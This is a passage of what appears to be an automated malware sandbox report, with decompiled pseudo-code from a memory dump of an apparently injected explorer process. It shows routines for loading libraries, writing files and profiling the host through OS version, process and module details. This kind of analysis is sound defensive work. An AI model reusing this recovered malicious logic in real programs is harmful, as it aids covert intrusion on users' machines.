                  				void* _t22;
                  				void* _t33;
                  
                  				_t8 =  *0x9e688; // 0xb0000
                  				E0009249B(_t8,  *((intOrPtr*)(_t8 + 0x224))); // executed
                  				E000885EF();
                  				E00088F78();
                  				 *0x9e780 = 0;
                  				 *0x9e784 = 0;
                  				 *0x9e77c = 0;
                  				E00085EB6(); // executed
                  				E0008CF84(_t22);
                  				_t14 =  *0x9e688; // 0xb0000
                  				 *((intOrPtr*)(_t14 + 0xa4)) = 2;
                  				_t15 =  *0x9e688; // 0xb0000
                  				E0008A86D( &_v44,  *((intOrPtr*)(_t15 + 0xac)) + 7,  *((intOrPtr*)(_t15 + 0xac)) + 7);
                  				E0008B337( &_v44);
                  				memset( &_v44, 0, 0x27);
                  				E00085C26( &_v44, _t33);
                  				ExitProcess(0);
                  			}










                  APIs
                    • Part of subcall function 000885EF: HeapCreate.KERNELBASE(00000000,00080000,00000000,00085FA7), ref: 000885F8
                    • Part of subcall function 0008CF84: GetCurrentProcess.KERNEL32(?,?,000B0000,?,00083545), ref: 0008CF90
                    • Part of subcall function 0008CF84: GetModuleFileNameW.KERNEL32(00000000,000B1644,00000105,?,?,000B0000,?,00083545), ref: 0008CFB1
                    • Part of subcall function 0008CF84: memset.MSVCRT ref: 0008CFE2
                    • Part of subcall function 0008CF84: GetVersionExA.KERNEL32(000B0000,000B0000,?,00083545), ref: 0008CFED
                    • Part of subcall function 0008CF84: GetCurrentProcessId.KERNEL32(?,00083545), ref: 0008CFF3
                    • Part of subcall function 0008B337: CloseHandle.KERNELBASE(00000000,?,00000000,00083C8A,?,?,?,?,?,?,?,?,00083D6F,00000000), ref: 0008B36A
                  • memset.MSVCRT ref: 00085D5F
                  • ExitProcess.KERNELBASE(00000000,?,?,?), ref: 00085D72
                  Memory Dump Source
                  • Source File: 0000000E.00000002.552591630.0000000000080000.00000040.00020000.sdmp, Offset: 00080000, based on PE: true
                  Joe Sandbox IDA Plugin
                  • Snapshot File: hcaresult_14_2_80000_explorer.jbxd
                  Similarity
                  • API ID: Process$Currentmemset$CloseCreateExitFileHandleHeapModuleNameVersion
                  • String ID:
                  • API String ID: 1180775259-0
                  Uniqueness

                  Uniqueness Score: -1.00%

                  Control-flow Graph

                  • Executed
                  • Not Executed
                  control_flow_graph 247 8e1bc-8e1dc call 895c7 250 8e1de-8e1e4 GetModuleHandleA 247->250 251 8e1e6-8e1eb LoadLibraryA 247->251 252 8e1ed-8e1ef 250->252 251->252 253 8e1fe-8e20c call 885c2 252->253 254 8e1f1-8e1f6 call 8e171 252->254 257 8e1fb-8e1fc 254->257 257->253
                  C-Code - Quality: 47%
                  			E0008E1BC(void* __ecx, void* __edx, intOrPtr _a4) {
                  				char _v8;
                  				char _t5;
                  				struct HINSTANCE__* _t7;
                  				void* _t10;
                  				void* _t12;
                  				void* _t22;
                  				void* _t25;
                  
                  				_push(__ecx);
                  				_t12 = __ecx;
                  				_t22 = __edx;
                  				_t5 = E000895C7(_a4);
                  				_t25 = 0;
                  				_v8 = _t5;
                  				_push(_t5);
                  				if(_a4 != 0x7c3) {
                  					_t7 = LoadLibraryA(); // executed
                  				} else {
                  					_t7 = GetModuleHandleA();
                  				}
                  				if(_t7 != 0) {
                  					_t10 = E0008E171(_t12, _t22, _t7); // executed
                  					_t25 = _t10;
                  				}
                  				E000885C2( &_v8);
                  				return _t25;
                  			}











                  APIs
                  • GetModuleHandleA.KERNEL32(00000000,00000000,00000001,?,0009BA28), ref: 0008E1DE
                  • LoadLibraryA.KERNEL32(00000000,00000000,00000001,?,0009BA28), ref: 0008E1EB
                  Memory Dump Source
                  • Source File: 0000000E.00000002.552591630.0000000000080000.00000040.00020000.sdmp, Offset: 00080000, based on PE: true
                  Joe Sandbox IDA Plugin
                  • Snapshot File: hcaresult_14_2_80000_explorer.jbxd
                  Similarity
                  • API ID: HandleLibraryLoadModule
                  • String ID:
                  • API String ID: 4133054770-0
                  Uniqueness

                  Uniqueness Score: -1.00%

                  Control-flow Graph

                  • Executed
                  • Not Executed
                  control_flow_graph 259 8a65c-8a66d 260 8a69e-8a6a0 259->260 261 8a66f-8a691 WriteFile 259->261 264 8a6a1-8a6a4 260->264 262 8a693-8a69c 261->262 263 8a6a5-8a6a7 261->263 262->260 262->261 263->264
                  C-Code - Quality: 88%
                  			E0008A65C(void* __ecx, void* __edx, intOrPtr _a4) {
                  				long _v8;
                  				void* _v12;
                  				void* _t13;
                  				void* _t21;
                  				void* _t23;
                  				void* _t26;
                  
                  				_t23 = __ecx;
                  				_push(__ecx);
                  				_push(__ecx);
                  				_t26 = 0;
                  				_v12 = __ecx;
                  				_t21 = __edx;
                  				if(_a4 == 0) {
                  					L3:
                  					_t13 = 1;
                  				} else {
                  					while(1) {
                  						_v8 = _v8 & 0x00000000;
                  						if(WriteFile(_t23, _t26 + _t21, _a4 - _t26,  &_v8, 0) == 0) {
                  							break;
                  						}
                  						_t26 = _t26 + _v8;
                  						_t23 = _v12;
                  						if(_t26 < _a4) {
                  							continue;
                  						} else {
                  							goto L3;
                  						}
                  						goto L4;
                  					}
                  					_t13 = 0;
                  				}
                  				L4:
                  				return _t13;
                  			}










                  APIs
                  • WriteFile.KERNELBASE(00000000,?,?,00000000,00000000,00000000,00000000,00000000,00000000,?,00088F51,?), ref: 0008A689
                  Memory Dump Source
                  • Source File: 0000000E.00000002.552591630.0000000000080000.00000040.00020000.sdmp, Offset: 00080000, based on PE: true
                  Joe Sandbox IDA Plugin
                  • Snapshot File: hcaresult_14_2_80000_explorer.jbxd
                  Similarity
                  • API ID: FileWrite
                  • String ID:
                  • API String ID: 3934441357-0
                  Uniqueness

                  Uniqueness Score: -1.00%

                  Control-flow Graph

                  • Executed
                  • Not Executed
                  control_flow_graph 265 8a5f7-8a61a CreateFileW 266 8a61c-8a61e 265->266 267 8a620-8a623 265->267 268 8a637-8a63a 266->268 269 8a635 267->269 270 8a625-8a62e 267->270 269->268 270->269
                  C-Code - Quality: 100%
                  			E0008A5F7(WCHAR* __ecx, long __edx) {
                  				intOrPtr _t6;
                  				long _t12;
                  				void* _t13;
                  
                  				_t12 = __edx;
                  				_t13 = CreateFileW(__ecx, 0x40000000, 0, 0, __edx, 0x80, 0);
                  				if(_t13 != 0xffffffff) {
                  					if(_t12 == 4) {
                  						_t6 =  *0x9e684; // 0x293f8f0
                  						 *((intOrPtr*)(_t6 + 0x80))(_t13, 0, 0, 2);
                  					}
                  					return _t13;
                  				}
                  				return 0;
                  			}







                  APIs
                  • CreateFileW.KERNELBASE(00000000,40000000,00000000,00000000,00000001,00000080,00000000,00000000,00000000,00000000,00088F39), ref: 0008A612
                  Memory Dump Source
                  • Source File: 0000000E.00000002.552591630.0000000000080000.00000040.00020000.sdmp, Offset: 00080000, based on PE: true
                  Joe Sandbox IDA Plugin
                  • Snapshot File: hcaresult_14_2_80000_explorer.jbxd
                  Similarity
                  • API ID: CreateFile
                  • String ID:
                  • API String ID: 823142352-0
                  Uniqueness

                  Uniqueness Score: -1.00%

                  Control-flow Graph

                  • Executed
                  • Not Executed
                  control_flow_graph 271 8a63b-8a65b CreateFileW
                  C-Code - Quality: 68%
                  			E0008A63B(WCHAR* __ecx) {
                  				signed int _t5;
                  
                  				_t5 = CreateFileW(__ecx, 0x80000000, 1, 0, 3, 0, 0);
                  				_t2 = _t5 + 1; // 0x1
                  				asm("sbb ecx, ecx");
                  				return _t5 &  ~_t2;
                  			}





                  APIs
                  • CreateFileW.KERNELBASE(00000000,80000000,00000001,00000000,00000003,00000000,00000000,0008A6C9,00000000,00000400,00000000,0008F8B5,0008F8B5,?,0008FA56,00000000), ref: 0008A64F
                  Memory Dump Source
                  • Source File: 0000000E.00000002.552591630.0000000000080000.00000040.00020000.sdmp, Offset: 00080000, based on PE: true
                  Joe Sandbox IDA Plugin
                  • Snapshot File: hcaresult_14_2_80000_explorer.jbxd
                  Similarity
                  • API ID: CreateFile
                  • String ID:
                  • API String ID: 823142352-0
                  Uniqueness

                  Uniqueness Score: -1.00%

                  Control-flow Graph

                  • Executed
                  • Not Executed
                  control_flow_graph 272 88604-88619 RtlAllocateHeap
                  C-Code - Quality: 100%
                  			E00088604(long _a4) {
                  				void* _t2;
                  
                  				_t2 = RtlAllocateHeap( *0x9e768, 8, _a4); // executed
                  				return _t2;
                  			}





                  APIs
                  • RtlAllocateHeap.NTDLL(00000008,?,?,00088F84,00000100,?,00085FCB), ref: 00088612
                  Memory Dump Source
                  • Source File: 0000000E.00000002.552591630.0000000000080000.00000040.00020000.sdmp, Offset: 00080000, based on PE: true
                  Joe Sandbox IDA Plugin
                  • Snapshot File: hcaresult_14_2_80000_explorer.jbxd
                  Similarity
                  • API ID: AllocateHeap
                  • String ID:
                  • API String ID: 1279760036-0
                  • Opcode ID: ddb3e1c4ab0669bcfb8209207dba11c67ad5171ec27cd050d23215c9b0b1c0cb
                  • Instruction ID: 357be25924eba7ef04d183b2a47d12fe0e858354009690af1988e616ee4df9af
                  • Opcode Fuzzy Hash: ddb3e1c4ab0669bcfb8209207dba11c67ad5171ec27cd050d23215c9b0b1c0cb
                  • Instruction Fuzzy Hash: 7FB09235084A08BBFE811B81ED09A847F69FB45A59F008012F608081708A6668649B82
                  Uniqueness

                  Uniqueness Score: -1.00%

                  Control-flow Graph

                  • Executed
                  • Not Executed
                  control_flow_graph 273 885ef-88603 HeapCreate
                  C-Code - Quality: 100%
                  			E000885EF() {
                  				void* _t1;
                  
                  				_t1 = HeapCreate(0, 0x80000, 0); // executed
                  				 *0x9e768 = _t1;
                  				return _t1;
                  			}





                  APIs
                  • HeapCreate.KERNELBASE(00000000,00080000,00000000,00085FA7), ref: 000885F8
                  Memory Dump Source
                  • Source File: 0000000E.00000002.552591630.0000000000080000.00000040.00020000.sdmp, Offset: 00080000, based on PE: true
                  Joe Sandbox IDA Plugin
                  • Snapshot File: hcaresult_14_2_80000_explorer.jbxd
                  Similarity
                  • API ID: CreateHeap
                  • String ID:
                  • API String ID: 10892065-0
                  • Opcode ID: 00561236055616d99284d0ac28147584d6f24b32db06d54aa00206475b8ac17a
                  • Instruction ID: a1789a6bc8b77e7cca538026a270896d431aa116e0d29a0d1dd02ebd4a2bf545
                  • Opcode Fuzzy Hash: 00561236055616d99284d0ac28147584d6f24b32db06d54aa00206475b8ac17a
                  • Instruction Fuzzy Hash: E5B01270684700A6F2905B609C06B007550B340F0AF304003F704582D0CAB41004CB16
                  Uniqueness

                  Uniqueness Score: -1.00%

                  C-Code - Quality: 89%
                  			E0008F9BF(void* __edx) {
                  				char _v8;
                  				char _v12;
                  				char _v16;
                  				char _v20;
                  				char _v24;
                  				intOrPtr _t26;
                  				char _t27;
                  				intOrPtr _t29;
                  				void* _t31;
                  				void* _t36;
                  				char _t38;
                  				intOrPtr _t39;
                  				char _t42;
                  				intOrPtr _t51;
                  				intOrPtr _t52;
                  				intOrPtr* _t63;
                  				intOrPtr _t66;
                  				char* _t67;
                  				intOrPtr _t69;
                  				char _t78;
                  				void* _t81;
                  				void* _t82;
                  
                  				_t26 =  *0x9e654; // 0x293fd30
                  				_t27 = E00088604( *((intOrPtr*)(_t26 + 4))); // executed
                  				_v12 = _t27;
                  				if(_t27 != 0) {
                  					_t63 =  *0x9e654; // 0x293fd30
                  					if( *((intOrPtr*)(_t63 + 4)) > 0x400) {
                  						E000886E1(_t27,  *_t63, 0x400);
                  						_v8 = 0;
                  						_t36 = E0008109A(_t63, 0x34a);
                  						_t66 =  *0x9e688; // 0xb0000
                  						_t72 =  !=  ? 0x67d : 0x615;
                  						_t38 = E000895E1(_t66,  !=  ? 0x67d : 0x615);
                  						_push(0);
                  						_push(_t36);
                  						_t67 = "\\";
                  						_v24 = _t38;
                  						_push(_t67);
                  						_push(_t38);
                  						_t39 =  *0x9e688; // 0xb0000
                  						_push(_t67);
                  						_v20 = E000892E5(_t39 + 0x1020);
                  						_t42 = E0008A6A9( &_v8, _t41,  &_v8); // executed
                  						_v16 = _t42;
                  						E000885D5( &_v24);
                  						E000885D5( &_v20);
                  						_t73 = _v16;
                  						_t82 = _t81 + 0x3c;
                  						_t69 = _v8;
                  						if(_v16 != 0 && _t69 > 0x400) {
                  							_t51 =  *0x9e654; // 0x293fd30
                  							_t52 =  *((intOrPtr*)(_t51 + 4));
                  							_t53 =  <  ? _t69 : _t52;
                  							_t54 = ( <  ? _t69 : _t52) + 0xfffffc00;
                  							E000886E1(_v12 + 0x400, _t73 + 0x400, ( <  ? _t69 : _t52) + 0xfffffc00);
                  							_t69 = _v8;
                  							_t82 = _t82 + 0xc;
                  						}
                  						E0008861A( &_v16, _t69);
                  						E0008861A( &_v20, 0xfffffffe);
                  						_t27 = _v12;
                  						_t81 = _t82 + 0x10;
                  						_t63 =  *0x9e654; // 0x293fd30
                  					}
                  					_t78 = 0;
                  					while(1) {
                  						_t29 =  *0x9e688; // 0xb0000
                  						_t31 = E0008A77D(_t29 + 0x228, _t27,  *((intOrPtr*)(_t63 + 4))); // executed
                  						_t81 = _t81 + 0xc;
                  						if(_t31 >= 0) {
                  							break;
                  						}
                  						Sleep(1);
                  						_t78 = _t78 + 1;
                  						if(_t78 < 0x2710) {
                  							_t27 = _v12;
                  							_t63 =  *0x9e654; // 0x293fd30
                  							continue;
                  						}
                  						break;
                  					}
                  					E0008861A( &_v12, 0); // executed
                  				}
                  				return 0;
                  			}


























                  APIs
                    • Part of subcall function 00088604: RtlAllocateHeap.NTDLL(00000008,?,?,00088F84,00000100,?,00085FCB), ref: 00088612
                  • Sleep.KERNELBASE(00000001,00000000,00000000,00000000,?,?,?,?,0008F8B5,?,?,?,0008FCB9,00000000), ref: 0008FAEC
                  Memory Dump Source
                  • Source File: 0000000E.00000002.552591630.0000000000080000.00000040.00020000.sdmp, Offset: 00080000, based on PE: true
                  Joe Sandbox IDA Plugin
                  • Snapshot File: hcaresult_14_2_80000_explorer.jbxd
                  Similarity
                  • API ID: AllocateHeapSleep
                  • String ID:
                  • API String ID: 4201116106-0
                  • Opcode ID: 218e46642d78c5d6b86fef64c9d17df7a156db10b2ffb4e54eab35899db9a0cc
                  • Instruction ID: 732f9496a7e373a88c7c7ec427939724ae18ee305fc23bc779ce3543d22a3d2a
                  • Opcode Fuzzy Hash: 218e46642d78c5d6b86fef64c9d17df7a156db10b2ffb4e54eab35899db9a0cc
                  • Instruction Fuzzy Hash: EA417CB2A00104ABEB04FBA4DD85EAE77BDFF54310B14407AF545E7242EB38AE15CB51
                  Uniqueness

                  Uniqueness Score: -1.00%

                  C-Code - Quality: 95%
                  			E00085D7D(void* __eflags) {
                  				char _v44;
                  				intOrPtr _t7;
                  				intOrPtr _t10;
                  				void* _t11;
                  				WCHAR* _t12;
                  				WCHAR* _t13;
                  				WCHAR* _t14;
                  				intOrPtr _t15;
                  				intOrPtr _t19;
                  				intOrPtr _t22;
                  				void* _t27;
                  				WCHAR* _t28;
                  
                  				_t7 =  *0x9e688; // 0xb0000
                  				E0008A86D( &_v44,  *((intOrPtr*)(_t7 + 0xac)) + 4, __eflags);
                  				_t10 =  *0x9e684; // 0x293f8f0
                  				_t28 = 2;
                  				_t11 =  *((intOrPtr*)(_t10 + 0xbc))(_t28, 0,  &_v44, _t27);
                  				if(_t11 == 0) {
                  					_t22 =  *0x9e688; // 0xb0000
                  					_t12 = E00085974( *((intOrPtr*)(_t22 + 0xac)), 0, __eflags); // executed
                  					 *0x9e6ac = _t12;
                  					__eflags = _t12;
                  					if(_t12 != 0) {
                  						_t14 = E00089EBB();
                  						__eflags = _t14;
                  						if(_t14 == 0) {
                  							_t28 = 0;
                  							__eflags = 0;
                  						} else {
                  							_t15 =  *0x9e688; // 0xb0000
                  							lstrcmpiW(_t15 + 0x228, _t14);
                  							asm("sbb esi, esi");
                  							_t28 = _t28 + 1;
                  						}
                  					}
                  					_t13 = _t28;
                  				} else {
                  					_t19 =  *0x9e684; // 0x293f8f0
                  					 *((intOrPtr*)(_t19 + 0x30))(_t11);
                  					_t13 = 3;
                  				}
                  				return _t13;
                  			}
















                  APIs
                  • lstrcmpiW.KERNEL32(000AFDD8,00000000), ref: 00085DF2
                  Memory Dump Source
                  • Source File: 0000000E.00000002.552591630.0000000000080000.00000040.00020000.sdmp, Offset: 00080000, based on PE: true
                  Joe Sandbox IDA Plugin
                  • Snapshot File: hcaresult_14_2_80000_explorer.jbxd
                  Similarity
                  • API ID: lstrcmpi
                  • String ID:
                  • API String ID: 1586166983-0
                  • Opcode ID: c923afb73669ec75941635bdc60b2afdcff15c460e427730a0ca5d080475e1cf
                  • Instruction ID: 4fec7bbb8dec9b8e29c5d3869e1073f411c91b91cf4618315680d6859f46272f
                  • Opcode Fuzzy Hash: c923afb73669ec75941635bdc60b2afdcff15c460e427730a0ca5d080475e1cf
                  • Instruction Fuzzy Hash: 0701D431300611DFF754FBA9DC49F9A33E8BB58381F094022F542EB2A2DA60DC00CBA1
                  Uniqueness

                  Uniqueness Score: -1.00%

                  C-Code - Quality: 100%
                  			E0008BA05() {
                  				signed int _v8;
                  				signed int _v12;
                  				intOrPtr _t15;
                  				void* _t16;
                  				void* _t18;
                  				void* _t21;
                  				intOrPtr _t22;
                  				void* _t24;
                  				void* _t30;
                  
                  				_v8 = _v8 & 0x00000000;
                  				_t15 =  *0x9e68c; // 0x293fab8
                  				_t16 =  *((intOrPtr*)(_t15 + 0x70))(_t24, 8,  &_v8, _t24, _t24);
                  				if(_t16 != 0) {
                  					_v12 = _v12 & 0x00000000;
                  					_t18 = E0008B998(1,  &_v12); // executed
                  					_t30 = _t18;
                  					if(_t30 != 0) {
                  						CloseHandle(_v8);
                  						_t21 = _t30;
                  					} else {
                  						if(_v8 != _t18) {
                  							_t22 =  *0x9e684; // 0x293f8f0
                  							 *((intOrPtr*)(_t22 + 0x30))(_v8);
                  						}
                  						_t21 = 0;
                  					}
                  					return _t21;
                  				} else {
                  					return _t16;
                  				}
                  			}













                  Memory Dump Source
                  • Source File: 0000000E.00000002.552591630.0000000000080000.00000040.00020000.sdmp, Offset: 00080000, based on PE: true
                  Joe Sandbox IDA Plugin
                  • Snapshot File: hcaresult_14_2_80000_explorer.jbxd
                  Similarity
                  • API ID:
                  • String ID:
                  • API String ID:
                  • Opcode ID: 453c99902ca0ae88522ce620eebd1f40cd1c7a33b57eec06d8be87d04b3e209a
                  • Instruction ID: c4d0144dd0226c5aba2f7410e7a6f6ad075efd4050d4223f465ea27968045e4c
                  • Opcode Fuzzy Hash: 453c99902ca0ae88522ce620eebd1f40cd1c7a33b57eec06d8be87d04b3e209a
                  • Instruction Fuzzy Hash: 13F03732A10208EFEF64EBA4CD4AAAE77F8FB54399F1140A9F141E7151EB74DE009B51
                  Uniqueness

                  Uniqueness Score: -1.00%

                  C-Code - Quality: 100%
                  			E0008861A(int _a4, intOrPtr _a8) {
                  				int _t3;
                  				intOrPtr _t4;
                  				void* _t9;
                  
                  				_t3 = _a4;
                  				if(_t3 == 0) {
                  					return _t3;
                  				}
                  				_t9 =  *_t3;
                  				if(_t9 != 0) {
                  					 *_t3 =  *_t3 & 0x00000000;
                  					_t4 = _a8;
                  					if(_t4 != 0xffffffff) {
                  						if(_t4 == 0xfffffffe) {
                  							_t4 = E0008C392(_t9);
                  						}
                  					} else {
                  						_t4 = E0008C379(_t9);
                  					}
                  					E0008874F(_t9, 0, _t4);
                  					_t3 = HeapFree( *0x9e768, 0, _t9); // executed
                  				}
                  				return _t3;
                  			}







                  APIs
                  • HeapFree.KERNEL32(00000000,00000000,00000001), ref: 00088660
                  Memory Dump Source
                  • Source File: 0000000E.00000002.552591630.0000000000080000.00000040.00020000.sdmp, Offset: 00080000, based on PE: true
                  Joe Sandbox IDA Plugin
                  • Snapshot File: hcaresult_14_2_80000_explorer.jbxd
                  Similarity
                  • API ID: FreeHeap
                  • String ID:
                  • API String ID: 3298025750-0
                  • Opcode ID: d40fe4e515ebaa9f762715e74f33d4f220579be74211f57eb1afd5a637472c7e
                  • Instruction ID: a28974b748b9f8cdd91a2a14d7a9ce437aea9645c05ed6ae8ab8bbe52d99dc9a
                  • Opcode Fuzzy Hash: d40fe4e515ebaa9f762715e74f33d4f220579be74211f57eb1afd5a637472c7e
                  • Instruction Fuzzy Hash: A4F0E5315016246FEA607A24EC01FAE3798BF12B30FA4C211F854EB1D1EF31AD1187E9
                  Uniqueness

                  Uniqueness Score: -1.00%

                  C-Code - Quality: 100%
                  			E0008A77D(WCHAR* _a4, intOrPtr _a8, intOrPtr _a12) {
                  				signed int _t5;
                  				void* _t6;
                  				void* _t10;
                  				long _t15;
                  				void* _t17;
                  
                  				_t15 = 2;
                  				_t5 = E0008A5F7(_a4, _t15);
                  				_t17 = _t5;
                  				if(_t17 != 0) {
                  					_t6 = E0008A65C(_t17, _a8, _a12); // executed
                  					if(_t6 != 0) {
                  						CloseHandle(_t17);
                  						return 0;
                  					}
                  					_t10 = 0xfffffffe;
                  					return _t10;
                  				}
                  				return _t5 | 0xffffffff;
                  			}









                  Memory Dump Source
                  • Source File: 0000000E.00000002.552591630.0000000000080000.00000040.00020000.sdmp, Offset: 00080000, based on PE: true
                  Joe Sandbox IDA Plugin
                  • Snapshot File: hcaresult_14_2_80000_explorer.jbxd
                  Similarity
                  • API ID: CreateFile
                  • String ID:
                  • API String ID: 823142352-0
                  • Opcode ID: 40f16143bd56816ec1f8bb97132b8114a443b5728d7a5c4d9aecef28d1fc0aa7
                  • Instruction ID: 663aae789e914c9616d0efe74e5f130c4bdd51193654dc020258e593981ed1c8
                  • Opcode Fuzzy Hash: 40f16143bd56816ec1f8bb97132b8114a443b5728d7a5c4d9aecef28d1fc0aa7
                  • Instruction Fuzzy Hash: 14E02236308A256BAB217A689C5099E37A4BF0A7707200213F9658BAC2DA30D84193D2
                  Uniqueness

                  Uniqueness Score: -1.00%

                  C-Code - Quality: 89%
                  			E0008B337(void* __ecx) {
                  				intOrPtr _t4;
                  				void* _t5;
                  				intOrPtr _t6;
                  				void* _t12;
                  				void* _t13;
                  
                  				_t4 =  *0x9e684; // 0x293f8f0
                  				_t13 = 0;
                  				_t5 =  *((intOrPtr*)(_t4 + 0xbc))(2, 0, __ecx);
                  				_t12 = _t5;
                  				if(_t12 != 0) {
                  					_t6 =  *0x9e684; // 0x293f8f0
                  					_push(_t12);
                  					if( *((intOrPtr*)(_t6 + 0xc0))() != 0) {
                  						_t13 = 1;
                  					}
                  					CloseHandle(_t12);
                  					return _t13;
                  				}
                  				return _t5;
                  			}









                  APIs
                  • CloseHandle.KERNELBASE(00000000,?,00000000,00083C8A,?,?,?,?,?,?,?,?,00083D6F,00000000), ref: 0008B36A
                  Memory Dump Source
                  • Source File: 0000000E.00000002.552591630.0000000000080000.00000040.00020000.sdmp, Offset: 00080000, based on PE: true
                  Joe Sandbox IDA Plugin
                  • Snapshot File: hcaresult_14_2_80000_explorer.jbxd
                  Similarity
                  • API ID: CloseHandle
                  • String ID:
                  • API String ID: 2962429428-0
                  • Opcode ID: 1aa3408248094b525e3aa245139550e6978348c105a51532174060b81b91920c
                  • Instruction ID: 8fe01f62ba4c39ee7338d5a8f0e8a0c9642a3c10550f89b54f48b15bd4262c2d
                  • Opcode Fuzzy Hash: 1aa3408248094b525e3aa245139550e6978348c105a51532174060b81b91920c
                  • Instruction Fuzzy Hash: 15E04F33300120ABD6609B69EC4CF677BA9FBA6A91F060169F905C7111CB248C02C7A1
                  Uniqueness

                  Uniqueness Score: -1.00%

                  Non-executed Functions

                  C-Code - Quality: 86%
                  			E0008D01F(void* __fp0) {
                  				char _v8;
                  				char _v12;
                  				char _v16;
                  				struct _SYSTEM_INFO _v52;
                  				char _v180;
                  				char _v692;
                  				char _v704;
                  				char _v2680;
                  				void* __esi;
                  				struct _OSVERSIONINFOA* _t81;
                  				intOrPtr _t83;
                  				void* _t84;
                  				long _t86;
                  				intOrPtr* _t88;
                  				intOrPtr _t90;
                  				intOrPtr _t95;
                  				intOrPtr _t97;
                  				void* _t98;
                  				intOrPtr _t103;
                  				char* _t105;
                  				void* _t108;
                  				char _t115;
                  				signed int _t117;
                  				char _t119;
                  				intOrPtr _t124;
                  				intOrPtr _t127;
                  				intOrPtr _t130;
                  				intOrPtr _t134;
                  				intOrPtr _t147;
                  				intOrPtr _t149;
                  				intOrPtr _t152;
                  				intOrPtr _t154;
                  				signed int _t159;
                  				struct HINSTANCE__* _t162;
                  				short* _t164;
                  				intOrPtr _t167;
                  				WCHAR* _t168;
                  				char* _t169;
                  				intOrPtr _t181;
                  				intOrPtr _t200;
                  				void* _t215;
                  				char _t218;
                  				void* _t219;
                  				char* _t220;
                  				struct _OSVERSIONINFOA* _t222;
                  				void* _t223;
                  				int* _t224;
                  				void* _t241;
                  
                  				_t241 = __fp0;
                  				_t162 =  *0x9e69c; // 0x10000000
                  				_t81 = E00088604(0x1ac4);
                  				_t222 = _t81;
                  				if(_t222 == 0) {
                  					return _t81;
                  				}
                  				 *((intOrPtr*)(_t222 + 0x1640)) = GetCurrentProcessId();
                  				_t83 =  *0x9e684; // 0x293f8f0
                  				_t84 =  *((intOrPtr*)(_t83 + 0xa0))(_t215);
                  				_t3 = _t222 + 0x648; // 0x648
                  				E00092301( *((intOrPtr*)(_t222 + 0x1640)) + _t84, _t3);
                  				_t5 = _t222 + 0x1644; // 0x1644
                  				_t216 = _t5;
                  				_t86 = GetModuleFileNameW(0, _t5, 0x105);
                  				_t227 = _t86;
                  				if(_t86 != 0) {
                  					 *((intOrPtr*)(_t222 + 0x1854)) = E00088FBE(_t216, _t227);
                  				}
                  				GetCurrentProcess();
                  				_t88 = E0008BA05();
                  				 *((intOrPtr*)(_t222 + 0x110)) = _t88;
                  				_t178 =  *_t88;
                  				if(E0008BB8D( *_t88) == 0) {
                  					_t90 = E0008BA62(_t178, _t222);
                  					__eflags = _t90;
                  					_t181 = (0 | _t90 > 0x00000000) + 1;
                  					__eflags = _t181;
                  					 *((intOrPtr*)(_t222 + 0x214)) = _t181;
                  				} else {
                  					 *((intOrPtr*)(_t222 + 0x214)) = 3;
                  				}
                  				_t12 = _t222 + 0x220; // 0x220
                  				 *((intOrPtr*)(_t222 + 0x218)) = E0008E3F1(_t12);
                  				 *((intOrPtr*)(_t222 + 0x21c)) = E0008E3B6(_t12);
                  				_push( &_v16);
                  				 *(_t222 + 0x224) = _t162;
                  				_push( &_v8);
                  				_v12 = 0x80;
                  				_push( &_v692);
                  				_v8 = 0x100;
                  				_push( &_v12);
                  				_t22 = _t222 + 0x114; // 0x114
                  				_push( *((intOrPtr*)( *((intOrPtr*)(_t222 + 0x110)))));
                  				_t95 =  *0x9e68c; // 0x293fab8
                  				_push(0);
                  				if( *((intOrPtr*)(_t95 + 0x6c))() == 0) {
                  					GetLastError();
                  				}
                  				_t97 =  *0x9e694; // 0x293fa48
                  				_t98 =  *((intOrPtr*)(_t97 + 0x3c))(0x1000);
                  				_t26 = _t222 + 0x228; // 0x228
                  				 *(_t222 + 0x1850) = 0 | _t98 > 0x00000000;
                  				GetModuleFileNameW( *(_t222 + 0x224), _t26, 0x105);
                  				GetLastError();
                  				_t31 = _t222 + 0x228; // 0x228
                  				 *((intOrPtr*)(_t222 + 0x434)) = E00088FBE(_t31, _t98);
                  				_t34 = _t222 + 0x114; // 0x114
                  				_t103 = E0008B7A8(_t34,  &_v692);
                  				_t35 = _t222 + 0xb0; // 0xb0
                  				 *((intOrPtr*)(_t222 + 0xac)) = _t103;
                  				_push(_t35);
                  				E0008B67D(_t103, _t35, _t98, _t241);
                  				_t37 = _t222 + 0xb0; // 0xb0
                  				_t105 = _t37;
                  				_t38 = _t222 + 0xd0; // 0xd0
                  				_t164 = _t38;
                  				if(_t105 != 0) {
                  					_t159 = MultiByteToWideChar(0, 0, _t105, 0xffffffff, _t164, 0x20);
                  					if(_t159 > 0) {
                  						_t164[_t159] = 0;
                  					}
                  				}
                  				_t41 = _t222 + 0x438; // 0x438
                  				_t42 = _t222 + 0x228; // 0x228
                  				E00088FD8(_t42, _t41);
                  				_t43 = _t222 + 0xb0; // 0xb0
                  				_t108 = E0008D400(_t43, E0008C379(_t43), 0);
                  				_t44 = _t222 + 0x100c; // 0x100c
                  				E0008B88A(_t108, _t44, _t241);
                  				_t199 = GetCurrentProcess();
                  				 *((intOrPtr*)(_t222 + 0x101c)) = E0008BBDF(_t110);
                  				memset(_t222, 0, 0x9c);
                  				_t224 = _t223 + 0xc;
                  				_t222->dwOSVersionInfoSize = 0x9c;
                  				GetVersionExA(_t222);
                  				_t167 =  *0x9e684; // 0x293f8f0
                  				_t115 = 0;
                  				_v8 = 0;
                  				if( *((intOrPtr*)(_t167 + 0x6c)) != 0) {
                  					 *((intOrPtr*)(_t167 + 0x6c))(GetCurrentProcess(),  &_v8);
                  					_t115 = _v8;
                  				}
                  				 *((intOrPtr*)(_t222 + 0xa8)) = _t115;
                  				if(_t115 == 0) {
                  					GetSystemInfo( &_v52);
                  					_t117 = _v52.dwOemId & 0x0000ffff;
                  				} else {
                  					_t117 = 9;
                  				}
                  				_t54 = _t222 + 0x1020; // 0x1020
                  				_t168 = _t54;
                  				 *(_t222 + 0x9c) = _t117;
                  				GetWindowsDirectoryW(_t168, 0x104);
                  				_t119 = E000895E1(_t199, 0x10c);
                  				_t200 =  *0x9e684; // 0x293f8f0
                  				_t218 = _t119;
                  				 *_t224 = 0x104;
                  				_push( &_v704);
                  				_push(_t218);
                  				_v8 = _t218;
                  				if( *((intOrPtr*)(_t200 + 0xe0))() == 0) {
                  					_t154 =  *0x9e684; // 0x293f8f0
                  					 *((intOrPtr*)(_t154 + 0xfc))(_t218, _t168);
                  				}
                  				E000885D5( &_v8);
                  				_t124 =  *0x9e684; // 0x293f8f0
                  				_t61 = _t222 + 0x1434; // 0x1434
                  				_t219 = _t61;
